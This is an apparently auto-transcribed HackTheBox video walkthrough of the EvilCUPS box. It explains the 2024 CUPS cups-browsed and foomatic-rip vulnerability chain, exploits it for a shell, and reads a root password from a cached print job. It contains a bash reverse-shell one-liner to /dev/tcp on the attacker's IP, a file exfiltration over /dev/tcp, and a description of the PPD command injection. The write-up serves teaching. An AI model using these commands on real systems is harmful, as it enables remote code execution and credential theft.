HackTheBox - EvilCUPS

Key Takeaways

what's going on YouTube this is ipeg we're doing evil cups from hack the box which is a non-competitive release so we can do a video on it right away the box is based on all the work evil socket did finding a vulnerability in cups which is the main Linux print server and by default it listens on UDP Port 631 on all host and this caused it to get a very high CVSs score because anyone that could talk to that UDP socket could then create a printer on the host that would execute a command when something is printed to it however because it required someone uh something being printed many people online kind of dismissed the high CVSs score because printing just doesn't happen on Linux all that often there are ways to remotely trigger print jobs in this box we will use the cups management server that's listenting on TCP 631 to print a test page and give us a shell on the box with that shell we'll then View cast print jobs on the box and discover that someone printed the server's root password and recover that job view it and log into the box as root so with that being said let's just jump in as we're going to start off with the end map so- SC for default scripts SV numerate versions - VV for double verost this gives us things like the TTL OA outut all formats put the end map directory and call it evil cups and then the IP address of 1010 11.40 this can take some time to run so I've already ran it looking at the results we have just two ports open the first one being SSH on Port 22 and the banner tells us it's a Debian server we also have the internet printing protocol I listening on Port 631 TCP and the banner tells us it's cups version 2.4 and then we have some web scripts of nmap running that tells us there is a web server on this interface so let's go ahead and take a look at it so I'm going to go to my browser HTP 101014 631 and we get the cups management interface and now normally this isn't exposed to all interfaces it's normally just bound on the loopback or Local Host but on a lot of just appliances that also have print servers let say like sonology nazes it is Exposed on all interfaces because not many people are on the console of those like Appliance print server things so occasionally you do see it exposed to the internet I think if you search Showdown right now there'd be like 70,000 just on the open internet um if we Google the whole Banner of this 242 it will tell us like when this was released so I'm going to Google open printing cups 242 change log and we see it was um on Google it told us it was in 2022 um there's a fix for CVN 2022 but this page was published May 26 2022 and also if we look at the further here the copyright is telling us 2022 and that's normally a good indicator at the last time a code has changed on a web server um just this being open really isn't a huge vulnerability because there is authentication that um behind dangerous actions like if we go to admin we just get it forbidden sometimes it'll promp you for credentials which is just HTTP basic off you just log in with local uh credentials there's also a way to do curos things like that but we're just a Anonymous user right now the one thing Anonymous users can do is enumerate printers so if we go to the printers we can see there is one printer the location is the server room and if we click on it we can do show completed jobs and then we can see there is one job that has been completed um we can also click on this drop down and do like print a test page and then if we look at the show completed jobs we see there are now two jobs completed and since we did this as Anonymous user it is disclosing the information we can see Anonymous created the job and the job's name is test page we can't see anything about this job um this is going to be important later on in the box but if we want to do something like say like delete or modify it's probably going to just say forbidden because that's a admin functionality so let's go ahead and talk about the elephant in the room and that is the big cups want ility of this year 2024 that happened like a week ago right if we wanted to we could do pseudo n map D capital u uh 10 10 1140 and we have to specify Port 631 whenever I do UDP scans I like uh gaining multiple ports because um UDP doesn't have a good way to tell you if it's open or not so I like having a like control that I know this should respond closed this one's open so I know 631 UDP is is listening which is the case on a lot of just cups in general this is going to be a very old protocol but to explain it better let's go ahead and navigate to the um blog post talking about the vulnerability from the finder of this um we went to evil socket's blog I'm sure you could Google like evil socket attacking cups or something like that and You' get over to this page but um I would recommend reading this entire thing because he does do a good job explaining it I'm not going to because it is long and we're going to go over everything handson doing a demo exploiting it right it really boils down to these four cves and combined they get a CVSs score of like 9.8 or 9.9 from Red Hat um I think he does talk about it somewhere here let's see CV SS there we go it's a 9.9 from red hat but let's just talk about the cve the first cve is going to be cups browse D binds on UDP any and this one is kind of odd because this is needed for cups browse d right the old protocol um well the purpose of Cups brows D is to be able to show you printers on the network right and the really old way to do this like a decade ago 2011 2012 and things like that was the printer would send a UDP broadcast message to the network on like Port 631 CS brows D would pick that up it would read that U packet and then say okay I'm going to go to that printer to download download the PPD the postcript printer description file and that lets it print to it right um newer ways use things like aahi bonjour zeroc com um whatever you want to call like those new ways to discover things and what really changed was the client sends a multicast DNS message out to the network and then things respond to it so the client's asking hey are there n printers the printers respond to it and then it goes and downloads the PPD file whereas the cups browse d listening on Port 631 UDP is really for printers initiating that broadcast so kind of a small change there and the fix here if we went to um cups browse d uh GitHub I think we'll be able to see the actual fix commits relatively recently all it does is disables this by default because again you can't really patch this because it's needed to function right that's the whole purpose of this so if you go to this thing the default browse protocol all they're doing is Dev vating to only DNS SSD which I forget exactly what that stands for but that's going to be using like aahi zeroc conf bonjour I forget there other names people call those type of Discovery things but in the blog post it also recommends disabling those because they're relatively insecure so the first cve is just about cups brows D um the next two are very similar this is going to be lib cup filter and lib PPD this one is um reading data from a IP server the internet printing protocol it doesn't filter any um Bad characters or enough Bad characters so you can have like line breaks and add extra attributes the lib PPD this one is just when it writes attributes it doesn't have sanitization so we don't do sanitization on um getting variables into the system we don't get them uh do sanitization when we get them out of the system so you could do them either place and then this attack chain would be fixed so that's what that is and again we're probably going to go over these again as we start exploiting them and then the final one is going to be this fumatic rip this again is going to be like one of those needed uh functionalities it was a big thing back in like 2011 because there was a command injection and kind of the fix was um we're not going to use fumatic rip over the network or at least we won't allow you to specify fumatic rip over the network but if print drivers want to put it in the PPD file and be installed locally we'll let them because what fumatic grip is is it's like a universal converter right printers don't accept documents of everything I can't just send like a PDF or JPEG to a printer and have it print um generally it goes through some conversion I'll probably convert it to a postcript format and then send it to the printer so fumatic rip is the way that the program does this and it's probably easy to just Google um let's say what do I want to Google exactly to pull this up fumatic rip command line issues maybe and find an old issue or config on how it works fumatic rip let's see fumatic rip command line if I just Google this do we get anything no everything's super recent I don't want that so I'm going to pause the video real quick and we're going to get to a better page to Showcase what fumatic rip is okay so I did it on my host and I all I did was search fumatic rip command line GitHub and I was clicking around and I saw this one issue if we go to the issue it kind of talks about how to properly well I guess I shouldn't say properly configure but an example configuration we give fumatic rip command line and then they're doing some bunch of magic to do a pearl conversion before it sends to the printer so the whole purpose of this is essentially it runs system on the parameter so if we can inject this into a uh PPD file then we can just put any command we want here and then it's going to execute it when things are printed so if we go back to this um this kind of like a feature like that's no real fix to cups brows D because we need to listen on UDP any for us to actually use that Legacy protocol so the only real fix there is disabling CBS brows D these two actual vulnerabilities because um it's allowing us to inject things into the PPD by just inserting Bad characters and then this one I don't know exactly how you fix it because again you're controlling a parameter in a config file that is just system it's just a bad design right so um let's go ahead and go to exploit these I bet if we went to the cups page now so if we do cups um that's Apple cups Cups GitHub there is a security um advisory that has some source code that we could potentially use however I have found that the code didn't work that well um this is not it maybe it's in cups browse D the downside with this is there's a lot of just projects and a lot of code to go through to chain all these things together but I want to say cups brows D is where the security issue is right here so you can also read this this is what was reported and then there's source code here but this source code I had trouble getting it working just out of the box um like it had both tabs and spaces like copy and paste was bad there are other few small things so I have U put my copy on my GitHub repost if you just go to GitHub IPC and I called it evil cups you should be able to download this script so let's just clone this to a box and then we can run it so I'm going to go code copy this and we can get clone CD evil cups and then to run this we're going to have to install the IP server so I'm going to do a python 3-m vm. VM so we're going to create our virtual environment so we can install python libraries so VM bin activate um pip 3 install d r requirements. text and this will install the IP server right I just cat requirements. text you can see it so let's go ahead and quickly go over this code to see exactly how it works so if I go to evil cups. py I'm going to go down to main real quick so we can see everything um the public PC had three for argv I just added an argument for running a command by default it just ran a touch command this just lets us put the reverse shell and standard in so right here we're going to stand up our um internet printing protocol server this is a HTP server and it's going to handle all the attributes building the PPD file for the client um but first let's talk about the send browse D packet and I'm actually going to comment this out real quick so we're going to run the first uh thing first without starting up the IP server so we can just see um what the request looks like so the browse D packet this is going to be what tells the print server we're on the network and um it should print from us so what I'm going to do is run this exploit so we can do Python 3 evil cups it wants our um IP address first then we do 10 10 11 40 which is the target the command it's not going to matter CU um I commented things out so this code's not going to work I just want to show you um what the request looks like and every time you attempt to add the printer it's probably going to take about 30 seconds to get the request sometimes this is instantaneous I think it's not working because there's not DNS on the server and it's like timing out or something so we just got to wait the 30 seconds and while I wait I want to stand up a wire shark so we can look at the UDP packet on The Wire so it should happen in about 5 Seconds we'll see the target connected and then there we go so this is the HTTP packet that gets sent so what happened is we sent this UDP packet I think this is is this it hypertext did I not capture it that's weird let's see one two three four five I don't see any UDP here huh they have a filter not capturing UDP that's weird um so we sent a UDP packet and then the server processed it and inside that UDP packet was the following let's just go up to here um we sent the printer type of two the printer state of three then we told it hey this is where the printer exist and then we gave it the location the info and the model and then it goes and sends a post and says hey we want to um get all the attributes I'm trying to find exactly where it is it's not in the easiest to read format uh there we go request attributes all so that is cups reaching back to us to install things um also in this we have the um exact kernel version that is running on the server but yeah that's that so let's go ahead oh I know I didn't capture the UDP because I wasn't running wire shark when I sent the packet that's why um so let's just oh not Bluetooth uh stop yes let's go ton zero there we go so I'm going to uncomment or IP server so now we'll respond with actual printer attributes and the attributes we send are going to be all of this right so we use the python Library I server just so we can put it in the correct format because it is a serialized format I guess we can look at it in wi shark when it goes but these are going to be all the um variables and then at the very bottom we're going to send one called print more info and then this is where the cve come into play right so we talked about um these two cves of it not validating or sanitizing the attributes so we say hey we got to print more info and then we put a line break in and then we say hey here's this parameter and then this parameter right so we're just writing these lines directly into the post fix um file and that's where we inject our Command so after we get rout on the box we'll look at the PPD file and I'm assuming this will make much more sense um once you can see the config but this is where that CV comes into play so we start the line off with a single quote because we just want to insert a blank variable so what it's going to do is like um star print more info and then this is where we have our inject so we're going to put a single quote in then the line break and then we're going to just say now do the fumatic rip command line run bin bash and then we do cups filter or whatever uh Auto completes not fixing it C Filter 2 and then we do some stuff here and then leave that second um apostrophe open so when the um where is the program lib cups filter goes to read this variable it will go ahead and add this double quote and now this is the entire print more info thing that writes directly into the PPD file um I know that's probably not making much sense but hopefully it will in hindsight once we finish the video so let's get rid of all this stuff and run the exploit and I probably should have ran that first because it does take 30 seconds and the command we want to run is going to be a B- C bash d i um let's do I think this yeah like this and then Dev TCP 10148 9,10 And1 like that and then we can close these out I don't know if I got these quotes in the wrong order or not um I don't think it actually matters so we'll run this and we going to wait the 30 seconds and while we wait we can look at the packet we sent to the box right so this is the packet we sent the cups thing there's the type it's idle the URI location make a model and to understand all of this um you could just go to um any of like the cups rfc's and understand it so if we went to like op Source Apple cups browse D protocol I think this is how I found it let's go here uh maybe this spe browsing Yep this is it and this says how it works right so we have type one is a hex digit or first we should say this is the whole packet so we send the type then wsp which means wh space then the state then wh space then URI wh space location wh space info you get it right so type one and hex digit so that is why in my script when we send this where is it the send browse D packet um printer type's going to be two and then I have the colon X in my F string so this makes it X right and then the state is going to be three which I think is idle and that's why this one is just an asky right because the RFC didn't tell me to do Hex it really doesn't matter because um three is the same as three and hex it's not until we go after nine that things really differ but I just want to try to obey this then we have the URI so after that we put the URL and then the really weird thing is location info make model it says quoted string so that's why you see when I do printer location info model these are strings and quotes right so that is the packet um we should have had 30 seconds pass the target connected and we sent the payload so let's go ahead now and navigate back to 631 if we go to SL printers we see there is an extra printer this hacked one so let's go here let's stand up our reverse shell so NCL lvmp 901 and I'm going to do print test page we sent it and now it hit my fumatic rip command line that I sent and we got a shell because that's what um we told it to do is run code so let's now upgrade our shell so we'll do Python 3 import PTY PTY spawn Ben bash like that there we go s2y raw minus Echo foreground enter twice so now we have a reverse shell as the um LP user and let's export term equal x term so I can clear the screen so what can we do as this user well remember at the start of the video we talked about um there being two printers or this Canon and there was a completed job so what we want to do is figure out where this file is the easiest way to do that I found is just a standup cups myself you could also do a lot of Googling but if you um install cups it's probably already installed and then enable it so we'll do system CTL Cup start uh is it start cups yeah start cups wrong way and now I can go to my local host 631 and I have my own server here right so if I go to printers um I got my physical printer uh behind me I don't want to use that one though what I want to use is just one I make so I'm going to go back over to to um my command line and I'm going to run LP admin and then we can say I think it's- P for Destination that's going to be I think the Q name I'm going to call it the void - capital E is going to enable it right away and then DV is going to be the device URI I'm just going to say this device is uh devnull so anything we print to this just immediately goes into the void so now if I go back to this page we can see a new printer here and if I go to print a test page we have the void d8 if I do show completed jobs there it is so I'm going to switch to the root user of my box and then we could just do some forensics this is where kind of Googling helps um if we googled uh let's see cups cash print jobs maybe it tell us the directory you could probably just guess the directory if you understand Linux structure but Google tells us verse bu cups cach so let's do CD verse bu cups cach no follow directory that should exist oh yes it's just vers cups there's no cash there's also ver cash cups and if we do that then we could also look at the jobs cache so if we cut this job. we can see the um like metadata around that like the name the destination created but the actual print job is here and the format of this is a little bit weird it is D and then five digits and then three digits this is going to be the print job so if I go back to my print server this is print job 8 and then this is going to be the page so if we went back to a shell um looks like our shell died so the print job's only going to last so long and then um it'll kill the job and when it kills the job it will probably kill your shell with it so to fix that what we do is um a no hop so I'm going to go back to this and we're going to do no hop and then we do a space Amper sand at the end so this is going to automatically background it and it's going to take 30 seconds for to come back and there is some automation on the box itself to clean up bad printers so once it goes into um a bad State it's bad State being a paused state it will automatically delete the printer if you do this in the real world um you may have trouble and you may have to go at it at a different IP address because it's going to be just in a state that it won't accept a new PPD file and you won't be able to get code execution it's really odd so um keep that in mind we just put a new shell in let's do NC whoops I want to listen on 90001 there it is we can go back to this one printers the Hacked stand up my test page and we have this so if I do a ps- ef-- forest we can explain exactly what happened um let's see python 3C we have to upgrade a shell real quick and I'll probably do this again at the very end of the video um maybe let's see we did Python 3 St raw Echo foreground okay PS ef-- Forest let's do less capital S uh we have to export a term and I also need to get the size of my TTY rows 28 columns 1 10 Forest L S there we go so what happened this is going to be a print job this is the test page right fumatic rip runs a command we can see it's defunct here but this before was a reverse shell and this one spawned a new process so because we did no hop with the Ampersand This Is Us um we did not have this before it's hard to show unless we want to get a whole new shell without no hop before we are all under this one print job so when it killed this job because it just timed out it took her shell with it but now we have forked to a new parent PID which is just one with no hop um when it goes and kills this job it's not going to kill this one so when you're exploiting this that no hop uh definitely makes it a lot more stable so where were we we were looking at the cache right so we're going to go to verse bull cups so if I do CD verse bull cups then we do LS we can't permission denied and the reason why we can't is we only have the executable bit set on this directory um root owns it we're group LP it's only executable so that means we can go in the directory but not list the contents however if we look at the files inside of this we can see the D file is going to be readable by the lp user and this is the cache we want so we just have to know the file name so if we go back to um this we can see where is we have to go to the printer so the Canon show completed jobs we want job one so if I do cat D and then 4 Zer one and then we want page one we get the post fix and it's telling us the title of the page is p. text and giving us this string so chances are it's going to be um the password right but let's just copy this file back to a box and then um convert to PDF so we can actually view what the page looks like because this is in postcript format so I'm going to exit this and we can say NC lvmp 901 and I'll call this job. PS and then we can cat that file to Dev TCP 101048 901 now we have the file here and we can use a command called PS2 PDF and we can say job PS job. PDF if we open job. PDF we have the page that was printed so we got password. text and the password which is break glass root evil cups so the whole theory behind this is the admin is sitting at his desk and his Cube and he want wants to go log into a box physically because maybe like it's not responding he needs to log into the local terminal so what he did was just print the password to the server room printer grabs the piece of paper and then you can go log in right I've seen a lot of people do that back when I was an admin I even did that occasionally probably not the best practice in hindsight but um yeah so let's now use that password to log in so we can do su- or we could have sshed as root but we get logged in so now that we're root let's go and explore the Box a little bit more to understand what happened I know I said it would make more sense in hindsight so let's go to ety and then cups PPD and then let's look at that PPD file this is what we had sent right so if we look at it we have AP supplies and I think AP supplies is actually what print more info means it's just a single quote a double quote and then another double quote and this line is what we're sending right here this print more info somehow gets translated to AP supplies I'm not sure exactly why it does but it does um and then we put the double quote here so this one double quote right here is ours and then we put a line break in so we could write this next line which is the fu um fumatic rip command line and then we put our Command here and then we wrote the next line of Cups Filter 2 and then oh I guess we have a space we probably don't need that space or maybe maybe that's another CV that space is probably important um I'm guessing because this has a space this one will override this one I'm not actually positive I'm confused here um I guess we can try taking the space away and trying the exploit again let's see let's do that is that space needed so what I'm doing here is a PF Forest oh I'm root right now um let's see if I go back here okay the printer's probably gone um normally when this error comes at least on this box that's the printer reaching back we don't handle something and that's when the printer goes in the pause state so I'm thinking um it should be cleaned up yes I don't even have a PPD file here anymore so it automatically cleaned itself up if I run this command again and now we don't have the space here and let's see um we can leave print more info there that's fine um actually let's do I don't want to change two things let's just change one I don't know if that AP more supplies thing um would error if it's not a um string or integer I don't know exactly what that wants so let's just keep it simple run the script again we'll wait 30 seconds and then we'll see if we can get a shell um without that one space and I guess I should have um did this without no hop so you could look at what the psf force looks like um I guess we'll fail one more time and then show you that piece and then probably wrap up the video so we got another 8 seconds for this to reach back and then the printer will come so we see nothing here 30 seconds hits that DNS query times out and now we suddenly have this so if we look at get hacked um let's go to fumatic rips now this cup filter doesn't have a space let's see what happens here um let's go to the Hacked did I listen I did so let's go NC print test page it's sent and we still got a shell so I don't know exactly what that space is doing maybe that's just an error in the script but it doesn't appear to matter so I'm just going to do this again CU I think for some reason if you didn't do the upgrade to a shell um and it cleaned up the job it would not actually kill your shell it's really bizarre um whoa I don't want that um FG I went into a different teamu session did I close t-u completely there we go this is what I want stty raw minus Echo foreground there we go but I think because we do the proper shell when it kills the parent process like the process gets a thread kill message and then decides to exit itself if we don't do the proper shell maybe it gets that thread kill and says I don't know what to do and doesn't exit um can't really explain it didn't play with it that much but yeah so I'm just going to uh wait for this to air it's probably going to be 2 to three minutes so I'm going to pause the video and then we'll resume okay so it has errored um this shell did not die because we did use the no hop so let's go ahead and what we want to do is change this to not use no hup so we can see exactly what the um call tree looks like so we're going to do this bash again and then while we wait um it's going to take again 30 seconds what do we want to look at uh we can actually change this real quick let's do a one here or I can do please subscribe there we go so we going to put a field here to prove that we are writing this double quote right here so that's the purpose of that um oh shoot I don't know if this is going to work now because I had to restart the server before it actually to take that change let's see what happens um let's go back to the printer we can do a print test page unable to print the class does not exist so we definitely dorked something up thankfully we have a root sh the printer doesn't exist SL printers doesn't exist at all so I think us putting that please subscribe caused it not the purse um not a huge surprise so let's change this to just an integer and maybe that will work better if not then we'll give up trying to prove that that one double quote is ours I guess maybe we could have done a space a space is probably going to be a safe character as well um but yeah let's just wait for these seconds to elapse and now that I'm thinking about it it may not be that I think that space colon matters cuz I changed this and then I didn't restart the server so the PPD file never updated oh that is painful um that is probably what happened so let's go back and I probably have to clean this up oh we got it it it's there search Okay um printers sometimes they just work right we sent the job we got this everything's working okay okay um ignore that tangent let's Now quickly do the Python 3 C import PTY PTY spawn b bash and we're going to look at the PPD file after this because I'm not exactly sure what just happened Dy raw minus Echo foreground enter enter um stty rows 28 calls 110 I think that's it um export term equals x term okay so it's kind of wonky because these two these are old ones right these are from my NOA I'd have to exit the whole shell to get rid of those but this is what the call trace of our print looks like right we have this hacked SA is defunct this is probably the sh executing fumatic rips and then it executes the reverse shell here and we go down so when this job gets cleaned up this shell goes away um these two are from my no hops so let's close this one we don't need it anymore this one we want to look at the PPD file real quick so if I look at this let's go to fumatic um the space colon doesn't seem to matter and the AP supplies please subscribe that work so um that proves that we wrote this one double quote then put the line break and did everything right so that's all good let's exit this quickly and hopefully it hasn't been the 5 minutes for the clean up to run so we still have the shell awesome uh let's BF l- capital S there we go so this is what it normally looks like if you don't have any no hops right so so as soon as it comes it's going to go kill or shell um yeah so hope you guys enjoyed the video that's probably going to be it I don't think there's anything else so take care and I'll oh I guess one last thing um we can talk about this again since we went over this at the beginning but hopefully now that you have the background of the video it may make more sense right so this cups browse D the vulnerability is it's listening on all host on Port 631 but it needs to that's how it functions right this is a legacy protocol though so you can disable this and um nothing happens you don't want to disable the whole browse D itself because while this is a legacy protocol it listening on UDP 60 631 is Legacy now it defaults to um DNS SSD so if I go back to cups um browse D look at the commits uh not issues commits do slow what's going on commits I'm going way too fast there we go default browsing protocol so now when dros um pull this source code and compile it's not going to listen on 631 because cups is removed there right it's only using dssd which is the multicast DNS one it's not perfect but it will limit us from being able to attack it across the network right if we're still on the local network we can respond to that mdns request and say hey here's the URI for a printer go download it and get code execution right um well as long as nothing else is patched right we can still make the cup server reach out to us to install a printer if we're on the local network because we can respond to the multicast DNS request that like aahi or bonjour would send so that's what the browse D is a Libs cup filter this is when our IP server sends or print attributes we can put a line break and it doesn't sanitize it so we can put some attributes in the file that it doesn't expect this one when it writes that file um it doesn't do sanitization so this actually makes it into the file that goes on disk and this one is just um fumatic rip command line accepts an argument and then run system against that to run the command so that's just dangerous um the whole report is talking about like how bad the experience was reporting this and I kind of get it from both sides right this is going to be one of those normal situations where a lot of people don't know how to fix the vulnerability when it's vulnerable by Design there wasn't really like a memory corruption or something that they could fix in the source code right this is just bad design and the filter and the browse D so I can see why like developers will kind of drag their feet if they don't fully understand security because they just like how do I fix this I can't you're it's vulnerable by Design we have to get rid of it or something so they get rid of this one and then like well we can't get rid of fumatic rip command line because so many printers use it if we do no one will be able to print so we're kind of screwed right um it's one of those just odd scenarios that you H that happens quite a bit when you do um pen testing the security people always just say well it should be fixed if it's not fixed then we can run code that's like what are you doing and then the delves are like I don't know how to fix it it's a bad situation to get into but um hopefully that kind of shed some light on why like Twitter may have been like negative around this entire thing the other thing is many people say that um people have to print to the printer in order to execute it but as we shown here there are other ways to trigger print jobs um you can use your imagination I know there's other ways I could exploit it where if I didn't have access to this if this was just listening on Local Host there may be a way to interact with the page still maybe like cross- a scripting so it's no longer um completely void of any user interaction but if they click on a malicious link then you can send them the print driver then have them um they'll browser go to Local Host and print the test page that way and get it Cod execution there's just um a big attack surface here so with all that being said I'm going to wrap the video up take care all and I'll see you all next time